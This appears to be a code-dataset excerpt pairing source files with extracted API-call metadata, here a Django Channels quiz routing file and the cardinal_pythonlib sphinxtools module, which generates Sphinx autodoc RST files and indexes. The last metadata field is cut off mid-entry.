code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from channels.staticfiles import StaticFilesConsumer
from .consumers import ws_connect, ws_receive, ws_disconnect, new_contestant, start_quiz, submit_answer
from channels import include, route
# Although we could, there is no path matching on these routes; instead we rely
# on the matching from the top-level routing.
websocket_routing = [
# This makes Django serve static files from settings.STATIC_URL, similar
# to django.views.static.serve. This isn't ideal (not exactly production
# quality) but it works for a minimal example.
route('http.request', StaticFilesConsumer()),
# Called when WebSockets connect
route("websocket.connect", ws_connect),
# Called when WebSockets get sent a data frame
route("websocket.receive", ws_receive),
# Called when WebSockets disconnect
route("websocket.disconnect", ws_disconnect),
]
channel_routing = [
# Handling different quiz commands (websocket.receive is decoded and put
# onto this channel) - routed on the "command" attribute of the decoded
# message.
route("quiz.receive", new_contestant, command="^new_contestant$"),
route("quiz.receive", start_quiz, command="^start_quiz$"),
route("quiz.receive", submit_answer, command="^submit_answer$"),
include("quiz.routing.websocket_routing"),
] | [
"channels.staticfiles.StaticFilesConsumer",
"channels.include",
"channels.route"
] | [((639, 677), 'channels.route', 'route', (['"""websocket.connect"""', 'ws_connect'], {}), "('websocket.connect', ws_connect)\n", (644, 677), False, 'from channels import include, route\n'), ((735, 773), 'channels.route', 'route', (['"""websocket.receive"""', 'ws_receive'], {}), "('websocket.receive', ws_receive)\n", (740, 773), False, 'from channels import include, route\n'), ((820, 864), 'channels.route', 'route', (['"""websocket.disconnect"""', 'ws_disconnect'], {}), "('websocket.disconnect', ws_disconnect)\n", (825, 864), False, 'from channels import include, route\n'), ((1061, 1126), 'channels.route', 'route', (['"""quiz.receive"""', 'new_contestant'], {'command': '"""^new_contestant$"""'}), "('quiz.receive', new_contestant, command='^new_contestant$')\n", (1066, 1126), False, 'from channels import include, route\n'), ((1132, 1189), 'channels.route', 'route', (['"""quiz.receive"""', 'start_quiz'], {'command': '"""^start_quiz$"""'}), "('quiz.receive', start_quiz, command='^start_quiz$')\n", (1137, 1189), False, 'from channels import include, route\n'), ((1195, 1258), 'channels.route', 'route', (['"""quiz.receive"""', 'submit_answer'], {'command': '"""^submit_answer$"""'}), "('quiz.receive', submit_answer, command='^submit_answer$')\n", (1200, 1258), False, 'from channels import include, route\n'), ((1264, 1305), 'channels.include', 'include', (['"""quiz.routing.websocket_routing"""'], {}), "('quiz.routing.websocket_routing')\n", (1271, 1305), False, 'from channels import include, route\n'), ((573, 594), 'channels.staticfiles.StaticFilesConsumer', 'StaticFilesConsumer', ([], {}), '()\n', (592, 594), False, 'from channels.staticfiles import StaticFilesConsumer\n')] |
#!/usr/bin/env python
# cardinal_pythonlib/sphinxtools.py
"""
===============================================================================
Original code copyright (C) 2009-2020 <NAME> (<EMAIL>).
This file is part of cardinal_pythonlib.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================================================
**Functions to help with Sphinx, in particular the generation of autodoc
files.**
Rationale: if you want Sphinx ``autodoc`` code to appear as "one module per
Sphinx page" (which I normally do), you need one ``.rst`` file per module.
"""
from enum import Enum
from fnmatch import fnmatch
import glob
import logging
from os.path import (
abspath, basename, dirname, exists, expanduser, isdir, isfile, join,
relpath, sep, splitext
)
from typing import Dict, Iterable, List, Union
from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir
from cardinal_pythonlib.logs import BraceStyleAdapter
from cardinal_pythonlib.reprfunc import auto_repr
from pygments.lexer import Lexer
from pygments.lexers import get_lexer_for_filename
from pygments.util import ClassNotFound
log = BraceStyleAdapter(logging.getLogger(__name__))
# =============================================================================
# Constants
# =============================================================================
AUTOGENERATED_COMMENT = ".. THIS FILE IS AUTOMATICALLY GENERATED. DO NOT EDIT."
DEFAULT_INDEX_TITLE = "Automatic documentation of source code"
DEFAULT_SKIP_GLOBS = ["__init__.py"]
EXT_PYTHON = ".py"
EXT_RST = ".rst"
CODE_TYPE_NONE = "none"
class AutodocMethod(Enum):
"""
Enum to specify the method of autodocumenting a file.
"""
BEST = 0
CONTENTS = 1
AUTOMODULE = 2
# =============================================================================
# Helper functions
# =============================================================================
def rst_underline(heading: str, underline_char: str) -> str:
"""
Underlines a heading for RST files.
Args:
heading: text to underline
underline_char: character to use
Returns:
underlined heading, over two lines (without a final terminating
newline)
"""
assert "\n" not in heading
assert len(underline_char) == 1
return heading + "\n" + (underline_char * len(heading))
def fail(msg: str) -> None:
log.critical(msg)
raise RuntimeError(msg)
def write_if_allowed(filename: str,
content: str,
overwrite: bool = False,
mock: bool = False) -> None:
"""
Writes the contents to a file, if permitted.
Args:
filename: filename to write
content: contents to write
overwrite: permit overwrites?
mock: pretend to write, but don't
Raises:
RuntimeError: if file exists but overwriting not permitted
"""
# Check we're allowed
if not overwrite and exists(filename):
fail(f"File exists, not overwriting: {filename!r}")
# Make the directory, if necessary
directory = dirname(filename)
if not mock:
mkdir_p(directory)
# Write the file
log.info("Writing to {!r}", filename)
if mock:
log.warning("Skipping writes as in mock mode")
else:
with open(filename, "wt") as outfile:
outfile.write(content)
# =============================================================================
# FileToAutodocument
# =============================================================================
class FileToAutodocument(object):
"""
Class representing a file to document automatically via Sphinx autodoc.
Example:
.. code-block:: python
import logging
from cardinal_pythonlib.logs import *
from cardinal_pythonlib.sphinxtools import *
main_only_quicksetup_rootlogger(level=logging.DEBUG)
f = FileToAutodocument(
source_filename="~/Documents/code/cardinal_pythonlib/cardinal_pythonlib/sphinxtools.py",
project_root_dir="~/Documents/code/cardinal_pythonlib",
target_rst_filename="~/Documents/code/cardinal_pythonlib/docs/source/autodoc/sphinxtools.rst",
)
print(f)
f.source_extension
f.is_python
f.source_filename_rel_project_root
f.rst_dir
f.source_filename_rel_rst_file
f.rst_filename_rel_project_root
f.rst_filename_rel_autodoc_index(
"~/Documents/code/cardinal_pythonlib/docs/source/autodoc/_index.rst")
f.python_module_name
f.pygments_code_type
print(f.rst_content(prefix=".. Hello!"))
print(f.rst_content(prefix=".. Hello!", method=AutodocMethod.CONTENTS))
f.write_rst(prefix=".. Hello!")
""" # noqa
def __init__(self,
source_filename: str,
project_root_dir: str,
target_rst_filename: str,
method: AutodocMethod = AutodocMethod.BEST,
python_package_root_dir: str = None,
source_rst_title_style_python: bool = True,
pygments_language_override: Dict[str, str] = None) -> None:
"""
Args:
source_filename: source file (e.g. Python, C++, XML file) to
document
project_root_dir: root directory of the whole project
target_rst_filename: filenamd of an RST file to write that will
document the source file
method: instance of :class:`AutodocMethod`; for example, should we
ask Sphinx's ``autodoc`` to read docstrings and build us a
pretty page, or just include the contents with syntax
highlighting?
python_package_root_dir: if your Python modules live in a directory
other than ``project_root_dir``, specify it here
source_rst_title_style_python: if ``True`` and the file is a Python
file and ``method == AutodocMethod.AUTOMODULE``, the heading
used will be in the style of a Python module, ``x.y.z``.
Otherwise, it will be a path (``x/y/z``).
pygments_language_override: if specified, a dictionary mapping
file extensions to Pygments languages (for example: a ``.pro``
file will be autodetected as Prolog, but you might want to
map that to ``none`` for Qt project files).
"""
self.source_filename = abspath(expanduser(source_filename))
self.project_root_dir = abspath(expanduser(project_root_dir))
self.target_rst_filename = abspath(expanduser(target_rst_filename))
self.method = method
self.source_rst_title_style_python = source_rst_title_style_python
self.python_package_root_dir = (
abspath(expanduser(python_package_root_dir))
if python_package_root_dir else self.project_root_dir
)
self.pygments_language_override = pygments_language_override or {} # type: Dict[str, str] # noqa
assert isfile(self.source_filename), (
f"Not a file: source_filename={self.source_filename!r}")
assert isdir(self.project_root_dir), (
f"Not a directory: project_root_dir={self.project_root_dir!r}")
assert relative_filename_within_dir(
filename=self.source_filename,
directory=self.project_root_dir
), (
f"Source file {self.source_filename!r} is not within "
f"project directory {self.project_root_dir!r}"
)
assert relative_filename_within_dir(
filename=self.python_package_root_dir,
directory=self.project_root_dir
), (
f"Python root {self.python_package_root_dir!r} is not within "
f"project directory {self.project_root_dir!r}"
)
assert isinstance(method, AutodocMethod)
def __repr__(self) -> str:
return auto_repr(self)
@property
def source_extension(self) -> str:
"""
Returns the extension of the source filename.
"""
return splitext(self.source_filename)[1]
@property
def is_python(self) -> bool:
"""
Is the source file a Python file?
"""
return self.source_extension == EXT_PYTHON
@property
def source_filename_rel_project_root(self) -> str:
"""
Returns the name of the source filename, relative to the project root.
Used to calculate file titles.
"""
return relpath(self.source_filename, start=self.project_root_dir)
@property
def source_filename_rel_python_root(self) -> str:
"""
Returns the name of the source filename, relative to the Python package
root. Used to calculate the name of Python modules.
"""
return relpath(self.source_filename,
start=self.python_package_root_dir)
@property
def rst_dir(self) -> str:
"""
Returns the directory of the target RST file.
"""
return dirname(self.target_rst_filename)
@property
def source_filename_rel_rst_file(self) -> str:
"""
Returns the source filename as seen from the RST filename that we
will generate. Used for ``.. include::`` commands.
"""
return relpath(self.source_filename, start=self.rst_dir)
@property
def rst_filename_rel_project_root(self) -> str:
"""
Returns the filename of the target RST file, relative to the project
root directory. Used for labelling the RST file itself.
"""
return relpath(self.target_rst_filename, start=self.project_root_dir)
def rst_filename_rel_autodoc_index(self, index_filename: str) -> str:
"""
Returns the filename of the target RST file, relative to a specified
index file. Used to make the index refer to the RST.
"""
index_dir = dirname(abspath(expanduser(index_filename)))
return relpath(self.target_rst_filename, start=index_dir)
@property
def python_module_name(self) -> str:
"""
Returns the name of the Python module that this instance refers to,
in dotted Python module notation, or a blank string if it doesn't.
"""
if not self.is_python:
return ""
filepath = self.source_filename_rel_python_root
dirs_and_base = splitext(filepath)[0]
dir_and_file_parts = dirs_and_base.split(sep)
return ".".join(dir_and_file_parts)
@property
def pygments_language(self) -> str:
"""
Returns the code type annotation for Pygments; e.g. ``python`` for
Python, ``cpp`` for C++, etc.
"""
extension = splitext(self.source_filename)[1]
if extension in self.pygments_language_override:
return self.pygments_language_override[extension]
try:
lexer = get_lexer_for_filename(self.source_filename) # type: Lexer
return lexer.name
except ClassNotFound:
log.warning("Don't know Pygments code type for extension {!r}",
self.source_extension)
return CODE_TYPE_NONE
def rst_content(self,
prefix: str = "",
suffix: str = "",
heading_underline_char: str = "=",
method: AutodocMethod = None) -> str:
"""
Returns the text contents of an RST file that will automatically
document our source file.
Args:
prefix: prefix, e.g. RST copyright comment
suffix: suffix, after the part we're creating
heading_underline_char: RST character to use to underline the
heading
method: optional method to override ``self.method``; see
constructor
Returns:
the RST contents
"""
spacer = " "
# Choose our final method
if method is None:
method = self.method
is_python = self.is_python
if method == AutodocMethod.BEST:
if is_python:
method = AutodocMethod.AUTOMODULE
else:
method = AutodocMethod.CONTENTS
elif method == AutodocMethod.AUTOMODULE:
if not is_python:
method = AutodocMethod.CONTENTS
# Write the instruction
if method == AutodocMethod.AUTOMODULE:
if self.source_rst_title_style_python:
title = self.python_module_name
else:
title = self.source_filename_rel_project_root
instruction = (
f".. automodule:: {self.python_module_name}\n"
f" :members:"
)
elif method == AutodocMethod.CONTENTS:
title = self.source_filename_rel_project_root
# Using ".. include::" with options like ":code: python" doesn't
# work properly; everything comes out as Python.
# Instead, see http://www.sphinx-doc.org/en/1.4.9/markup/code.html;
# we need ".. literalinclude::" with ":language: LANGUAGE".
instruction = (
".. literalinclude:: {filename}\n"
"{spacer}:language: {language}".format(
filename=self.source_filename_rel_rst_file,
spacer=spacer,
language=self.pygments_language
)
)
else:
raise ValueError("Bad method!")
# Create the whole file
content = """
.. {filename}
{AUTOGENERATED_COMMENT}
{prefix}
{underlined_title}
{instruction}
{suffix}
""".format(
filename=self.rst_filename_rel_project_root,
AUTOGENERATED_COMMENT=AUTOGENERATED_COMMENT,
prefix=prefix,
underlined_title=rst_underline(
title, underline_char=heading_underline_char),
instruction=instruction,
suffix=suffix,
).strip() + "\n"
return content
def write_rst(self,
prefix: str = "",
suffix: str = "",
heading_underline_char: str = "=",
method: AutodocMethod = None,
overwrite: bool = False,
mock: bool = False) -> None:
"""
Writes the RST file to our destination RST filename, making any
necessary directories.
Args:
prefix: as for :func:`rst_content`
suffix: as for :func:`rst_content`
heading_underline_char: as for :func:`rst_content`
method: as for :func:`rst_content`
overwrite: overwrite the file if it exists already?
mock: pretend to write, but don't
"""
content = self.rst_content(
prefix=prefix,
suffix=suffix,
heading_underline_char=heading_underline_char,
method=method
)
write_if_allowed(self.target_rst_filename, content,
overwrite=overwrite, mock=mock)
# =============================================================================
# AutodocIndex
# =============================================================================
class AutodocIndex(object):
"""
Class to make an RST file that indexes others.
Example:
.. code-block:: python
import logging
from cardinal_pythonlib.logs import *
from cardinal_pythonlib.sphinxtools import *
main_only_quicksetup_rootlogger(level=logging.INFO)
# Example where one index contains another:
subidx = AutodocIndex(
index_filename="~/Documents/code/cardinal_pythonlib/docs/source/autodoc/_index2.rst",
highest_code_dir="~/Documents/code/cardinal_pythonlib",
project_root_dir="~/Documents/code/cardinal_pythonlib",
autodoc_rst_root_dir="~/Documents/code/cardinal_pythonlib/docs/source/autodoc",
source_filenames_or_globs="~/Documents/code/cardinal_pythonlib/docs/*.py",
)
idx = AutodocIndex(
index_filename="~/Documents/code/cardinal_pythonlib/docs/source/autodoc/_index.rst",
highest_code_dir="~/Documents/code/cardinal_pythonlib",
project_root_dir="~/Documents/code/cardinal_pythonlib",
autodoc_rst_root_dir="~/Documents/code/cardinal_pythonlib/docs/source/autodoc",
source_filenames_or_globs="~/Documents/code/cardinal_pythonlib/cardinal_pythonlib/*.py",
)
idx.add_index(subidx)
print(idx.index_content())
idx.write_index_and_rst_files(overwrite=True, mock=True)
# Example with a flat index:
flatidx = AutodocIndex(
index_filename="~/Documents/code/cardinal_pythonlib/docs/source/autodoc/_index.rst",
highest_code_dir="~/Documents/code/cardinal_pythonlib/cardinal_pythonlib",
project_root_dir="~/Documents/code/cardinal_pythonlib",
autodoc_rst_root_dir="~/Documents/code/cardinal_pythonlib/docs/source/autodoc",
source_filenames_or_globs="~/Documents/code/cardinal_pythonlib/cardinal_pythonlib/*.py",
)
print(flatidx.index_content())
flatidx.write_index_and_rst_files(overwrite=True, mock=True)
""" # noqa
def __init__(self,
index_filename: str,
project_root_dir: str,
autodoc_rst_root_dir: str,
highest_code_dir: str,
python_package_root_dir: str = None,
source_filenames_or_globs: Union[str, Iterable[str]] = None,
index_heading_underline_char: str = "-",
source_rst_heading_underline_char: str = "~",
title: str = DEFAULT_INDEX_TITLE,
introductory_rst: str = "",
recursive: bool = True,
skip_globs: List[str] = None,
toctree_maxdepth: int = 1,
method: AutodocMethod = AutodocMethod.BEST,
rst_prefix: str = "",
rst_suffix: str = "",
source_rst_title_style_python: bool = True,
pygments_language_override: Dict[str, str] = None) -> None:
"""
Args:
index_filename:
filename of the index ``.RST`` (ReStructured Text) file to
create
project_root_dir:
top-level directory for the whole project
autodoc_rst_root_dir:
directory within which all automatically generated ``.RST``
files (each to document a specific source file) will be placed.
A directory hierarchy within this directory will be created,
reflecting the structure of the code relative to
``highest_code_dir`` (q.v.).
highest_code_dir:
the "lowest" directory such that all code is found within it;
the directory structure within ``autodoc_rst_root_dir`` is to
``.RST`` files what the directory structure is of the source
files, relative to ``highest_code_dir``.
python_package_root_dir:
if your Python modules live in a directory other than
``project_root_dir``, specify it here
source_filenames_or_globs:
optional string, or list of strings, each describing a file or
glob-style file specification; these are the source filenames
to create automatic RST` for. If you don't specify them here,
you can use :func:`add_source_files`. To add sub-indexes, use
:func:`add_index` and :func:`add_indexes`.
index_heading_underline_char:
the character used to underline the title in the index file
source_rst_heading_underline_char:
the character used to underline the heading in each of the
source files
title:
title for the index
introductory_rst:
extra RST for the index, which goes between the title and the
table of contents
recursive:
use :func:`glob.glob` in recursive mode?
skip_globs:
list of file names or file specifications to skip; e.g.
``['__init__.py']``
toctree_maxdepth:
``maxdepth`` parameter for the ``toctree`` command generated in
the index file
method:
see :class:`FileToAutodocument`
rst_prefix:
optional RST content (e.g. copyright comment) to put early on
in each of the RST files
rst_suffix:
optional RST content to put late on in each of the RST files
source_rst_title_style_python:
make the individual RST files use titles in the style of Python
modules, ``x.y.z``, rather than path style (``x/y/z``); path
style will be used for non-Python files in any case.
pygments_language_override:
if specified, a dictionary mapping file extensions to Pygments
languages (for example: a ``.pro`` file will be autodetected as
Prolog, but you might want to map that to ``none`` for Qt
project files).
"""
assert index_filename
assert project_root_dir
assert autodoc_rst_root_dir
assert isinstance(toctree_maxdepth, int)
assert isinstance(method, AutodocMethod)
self.index_filename = abspath(expanduser(index_filename))
self.title = title
self.introductory_rst = introductory_rst
self.project_root_dir = abspath(expanduser(project_root_dir))
self.autodoc_rst_root_dir = abspath(expanduser(autodoc_rst_root_dir))
self.highest_code_dir = abspath(expanduser(highest_code_dir))
self.python_package_root_dir = (
abspath(expanduser(python_package_root_dir))
if python_package_root_dir else self.project_root_dir
)
self.index_heading_underline_char = index_heading_underline_char
self.source_rst_heading_underline_char = source_rst_heading_underline_char # noqa
self.recursive = recursive
self.skip_globs = skip_globs if skip_globs is not None else DEFAULT_SKIP_GLOBS # noqa
self.toctree_maxdepth = toctree_maxdepth
self.method = method
self.rst_prefix = rst_prefix
self.rst_suffix = rst_suffix
self.source_rst_title_style_python = source_rst_title_style_python
self.pygments_language_override = pygments_language_override or {} # type: Dict[str, str] # noqa
assert isdir(self.project_root_dir), (
f"Not a directory: project_root_dir={self.project_root_dir!r}")
assert relative_filename_within_dir(
filename=self.index_filename,
directory=self.project_root_dir
), (
f"Index file {self.index_filename!r} is not within "
f"project directory {self.project_root_dir!r}"
)
assert relative_filename_within_dir(
filename=self.highest_code_dir,
directory=self.project_root_dir
), (
f"Highest code directory {self.highest_code_dir!r} is not within "
f"project directory {self.project_root_dir!r}"
)
assert relative_filename_within_dir(
filename=self.autodoc_rst_root_dir,
directory=self.project_root_dir
), (
f"Autodoc RST root directory {self.autodoc_rst_root_dir!r} is not "
f"within project directory {self.project_root_dir!r}"
)
assert isinstance(method, AutodocMethod)
assert isinstance(recursive, bool)
self.files_to_index = [] # type: List[Union[FileToAutodocument, AutodocIndex]] # noqa
if source_filenames_or_globs:
self.add_source_files(source_filenames_or_globs)
def __repr__(self) -> str:
return auto_repr(self)
def add_source_files(
self,
source_filenames_or_globs: Union[str, List[str]],
method: AutodocMethod = None,
recursive: bool = None,
source_rst_title_style_python: bool = None,
pygments_language_override: Dict[str, str] = None) -> None:
"""
Adds source files to the index.
Args:
source_filenames_or_globs: string containing a filename or a
glob, describing the file(s) to be added, or a list of such
strings
method: optional method to override ``self.method``
recursive: use :func:`glob.glob` in recursive mode? (If ``None``,
the default, uses the version from the constructor.)
source_rst_title_style_python: optional to override
``self.source_rst_title_style_python``
pygments_language_override: optional to override
``self.pygments_language_override``
"""
if not source_filenames_or_globs:
return
if method is None:
# Use the default
method = self.method
if recursive is None:
recursive = self.recursive
if source_rst_title_style_python is None:
source_rst_title_style_python = self.source_rst_title_style_python
if pygments_language_override is None:
pygments_language_override = self.pygments_language_override
# Get a sorted list of filenames
final_filenames = self.get_sorted_source_files(
source_filenames_or_globs,
recursive=recursive
)
# Process that sorted list
for source_filename in final_filenames:
self.files_to_index.append(FileToAutodocument(
source_filename=source_filename,
project_root_dir=self.project_root_dir,
python_package_root_dir=self.python_package_root_dir,
target_rst_filename=self.specific_file_rst_filename(
source_filename
),
method=method,
source_rst_title_style_python=source_rst_title_style_python,
pygments_language_override=pygments_language_override,
))
def get_sorted_source_files(
self,
source_filenames_or_globs: Union[str, List[str]],
recursive: bool = True) -> List[str]:
"""
Returns a sorted list of filenames to process, from a filename,
a glob string, or a list of filenames/globs.
Args:
source_filenames_or_globs: filename/glob, or list of them
recursive: use :func:`glob.glob` in recursive mode?
Returns:
sorted list of files to process
"""
if isinstance(source_filenames_or_globs, str):
source_filenames_or_globs = [source_filenames_or_globs]
final_filenames = [] # type: List[str]
for sfg in source_filenames_or_globs:
sfg_expanded = expanduser(sfg)
log.debug("Looking for: {!r}", sfg_expanded)
for filename in glob.glob(sfg_expanded, recursive=recursive):
log.debug("Trying: {!r}", filename)
if self.should_exclude(filename):
log.info("Skipping file {!r}", filename)
continue
final_filenames.append(filename)
final_filenames.sort()
return final_filenames
@staticmethod
def filename_matches_glob(filename: str, globtext: str) -> bool:
"""
The ``glob.glob`` function doesn't do exclusion very well. We don't
want to have to specify root directories for exclusion patterns. We
don't want to have to trawl a massive set of files to find exclusion
files. So let's implement a glob match.
Args:
filename: filename
globtext: glob
Returns:
does the filename match the glob?
See also:
- https://stackoverflow.com/questions/20638040/glob-exclude-pattern
"""
# Quick check on basename-only matching
if fnmatch(filename, globtext):
log.debug("{!r} matches {!r}", filename, globtext)
return True
bname = basename(filename)
if fnmatch(bname, globtext):
log.debug("{!r} matches {!r}", bname, globtext)
return True
# Directory matching: is actually accomplished by the code above!
# Otherwise:
return False
def should_exclude(self, filename) -> bool:
"""
Should we exclude this file from consideration?
"""
for skip_glob in self.skip_globs:
if self.filename_matches_glob(filename, skip_glob):
return True
return False
def add_index(self, index: "AutodocIndex") -> None:
"""
Add a sub-index file to this index.
Args:
index: index file to add, as an instance of :class:`AutodocIndex`
"""
self.files_to_index.append(index)
def add_indexes(self, indexes: List["AutodocIndex"]) -> None:
"""
Adds multiple sub-indexes to this index.
Args:
indexes: list of sub-indexes
"""
for index in indexes:
self.add_index(index)
def specific_file_rst_filename(self, source_filename: str) -> str:
"""
Gets the RST filename corresponding to a source filename.
See the help for the constructor for more details.
Args:
source_filename: source filename within current project
Returns:
RST filename
Note in particular: the way we structure the directories means that we
won't get clashes between files with idential names in two different
directories. However, we must also incorporate the original source
filename, in particular for C++ where ``thing.h`` and ``thing.cpp``
must not generate the same RST filename. So we just add ``.rst``.
"""
highest_code_to_target = relative_filename_within_dir(
source_filename, self.highest_code_dir)
bname = basename(source_filename)
result = join(self.autodoc_rst_root_dir,
dirname(highest_code_to_target),
bname + EXT_RST)
log.debug("Source {!r} -> RST {!r}", source_filename, result)
return result
def write_index_and_rst_files(self, overwrite: bool = False,
mock: bool = False) -> None:
"""
Writes both the individual RST files and the index.
Args:
overwrite: allow existing files to be overwritten?
mock: pretend to write, but don't
"""
for f in self.files_to_index:
if isinstance(f, FileToAutodocument):
f.write_rst(
prefix=self.rst_prefix,
suffix=self.rst_suffix,
heading_underline_char=self.source_rst_heading_underline_char, # noqa
overwrite=overwrite,
mock=mock,
)
elif isinstance(f, AutodocIndex):
f.write_index_and_rst_files(overwrite=overwrite, mock=mock)
else:
fail(f"Unknown thing in files_to_index: {f!r}")
self.write_index(overwrite=overwrite, mock=mock)
@property
def index_filename_rel_project_root(self) -> str:
"""
Returns the name of the index filename, relative to the project root.
Used for labelling the index file.
"""
return relpath(self.index_filename, start=self.project_root_dir)
def index_filename_rel_other_index(self, other: str) -> str:
"""
Returns the filename of this index, relative to the director of another
index. (For inserting a reference to this index into ``other``.)
Args:
other: the other index
Returns:
relative filename of our index
"""
return relpath(self.index_filename, start=dirname(other))
def index_content(self) -> str:
"""
Returns the contents of the index RST file.
"""
# Build the toctree command
index_filename = self.index_filename
spacer = " "
toctree_lines = [
".. toctree::",
spacer + f":maxdepth: {self.toctree_maxdepth}",
""
]
for f in self.files_to_index:
if isinstance(f, FileToAutodocument):
rst_filename = spacer + f.rst_filename_rel_autodoc_index(
index_filename)
elif isinstance(f, AutodocIndex):
rst_filename = (
spacer + f.index_filename_rel_other_index(index_filename)
)
else:
fail(f"Unknown thing in files_to_index: {f!r}")
rst_filename = "" # won't get here; for the type checker
toctree_lines.append(rst_filename)
toctree = "\n".join(toctree_lines)
# Create the whole file
content = """
.. {filename}
{AUTOGENERATED_COMMENT}
{prefix}
{underlined_title}
{introductory_rst}
{toctree}
{suffix}
""".format(
filename=self.index_filename_rel_project_root,
AUTOGENERATED_COMMENT=AUTOGENERATED_COMMENT,
prefix=self.rst_prefix,
underlined_title=rst_underline(
self.title, underline_char=self.index_heading_underline_char),
introductory_rst=self.introductory_rst,
toctree=toctree,
suffix=self.rst_suffix,
).strip() + "\n"
return content
def write_index(self, overwrite: bool = False, mock: bool = False) -> None:
"""
Writes the index file, if permitted.
Args:
overwrite: allow existing files to be overwritten?
mock: pretend to write, but don't
"""
write_if_allowed(self.index_filename, self.index_content(),
overwrite=overwrite, mock=mock)
| [
"logging.getLogger",
"os.path.exists",
"pygments.lexers.get_lexer_for_filename",
"cardinal_pythonlib.reprfunc.auto_repr",
"os.path.splitext",
"cardinal_pythonlib.fileops.relative_filename_within_dir",
"os.path.isfile",
"os.path.dirname",
"os.path.isdir",
"fnmatch.fnmatch",
"os.path.basename",
... | [((1712, 1739), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1729, 1739), False, 'import logging\n'), ((3665, 3682), 'os.path.dirname', 'dirname', (['filename'], {}), '(filename)\n', (3672, 3682), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((3531, 3547), 'os.path.exists', 'exists', (['filename'], {}), '(filename)\n', (3537, 3547), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((3708, 3726), 'cardinal_pythonlib.fileops.mkdir_p', 'mkdir_p', (['directory'], {}), '(directory)\n', (3715, 3726), False, 'from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir\n'), ((7693, 7721), 'os.path.isfile', 'isfile', (['self.source_filename'], {}), '(self.source_filename)\n', (7699, 7721), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((7809, 7837), 'os.path.isdir', 'isdir', (['self.project_root_dir'], {}), '(self.project_root_dir)\n', (7814, 7837), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((7932, 8029), 'cardinal_pythonlib.fileops.relative_filename_within_dir', 'relative_filename_within_dir', ([], {'filename': 'self.source_filename', 'directory': 'self.project_root_dir'}), '(filename=self.source_filename, directory=self.\n project_root_dir)\n', (7960, 8029), False, 'from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir\n'), ((8213, 8317), 'cardinal_pythonlib.fileops.relative_filename_within_dir', 'relative_filename_within_dir', ([], {'filename': 'self.python_package_root_dir', 'directory': 'self.project_root_dir'}), '(filename=self.python_package_root_dir,\n directory=self.project_root_dir)\n', (8241, 8317), False, 'from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir\n'), ((8591, 8606), 'cardinal_pythonlib.reprfunc.auto_repr', 'auto_repr', (['self'], {}), '(self)\n', (8600, 8606), False, 'from cardinal_pythonlib.reprfunc import auto_repr\n'), ((9180, 9238), 'os.path.relpath', 'relpath', (['self.source_filename'], {'start': 'self.project_root_dir'}), '(self.source_filename, start=self.project_root_dir)\n', (9187, 9238), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((9487, 9552), 'os.path.relpath', 'relpath', (['self.source_filename'], {'start': 'self.python_package_root_dir'}), '(self.source_filename, start=self.python_package_root_dir)\n', (9494, 9552), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((9714, 9747), 'os.path.dirname', 'dirname', (['self.target_rst_filename'], {}), '(self.target_rst_filename)\n', (9721, 9747), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((9986, 10035), 'os.path.relpath', 'relpath', (['self.source_filename'], {'start': 'self.rst_dir'}), '(self.source_filename, start=self.rst_dir)\n', (9993, 10035), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((10283, 10345), 'os.path.relpath', 'relpath', (['self.target_rst_filename'], {'start': 'self.project_root_dir'}), '(self.target_rst_filename, start=self.project_root_dir)\n', (10290, 10345), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((10663, 10713), 'os.path.relpath', 'relpath', (['self.target_rst_filename'], {'start': 'index_dir'}), '(self.target_rst_filename, start=index_dir)\n', (10670, 10713), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((23642, 23670), 'os.path.isdir', 'isdir', (['self.project_root_dir'], {}), '(self.project_root_dir)\n', (23647, 23670), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((23765, 23861), 'cardinal_pythonlib.fileops.relative_filename_within_dir', 'relative_filename_within_dir', ([], {'filename': 'self.index_filename', 'directory': 'self.project_root_dir'}), '(filename=self.index_filename, directory=self.\n project_root_dir)\n', (23793, 23861), False, 'from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir\n'), ((24043, 24141), 'cardinal_pythonlib.fileops.relative_filename_within_dir', 'relative_filename_within_dir', ([], {'filename': 'self.highest_code_dir', 'directory': 'self.project_root_dir'}), '(filename=self.highest_code_dir, directory=self\n .project_root_dir)\n', (24071, 24141), False, 'from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir\n'), ((24337, 24439), 'cardinal_pythonlib.fileops.relative_filename_within_dir', 'relative_filename_within_dir', ([], {'filename': 'self.autodoc_rst_root_dir', 'directory': 'self.project_root_dir'}), '(filename=self.autodoc_rst_root_dir, directory=\n self.project_root_dir)\n', (24365, 24439), False, 'from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir\n'), ((24963, 24978), 'cardinal_pythonlib.reprfunc.auto_repr', 'auto_repr', (['self'], {}), '(self)\n', (24972, 24978), False, 'from 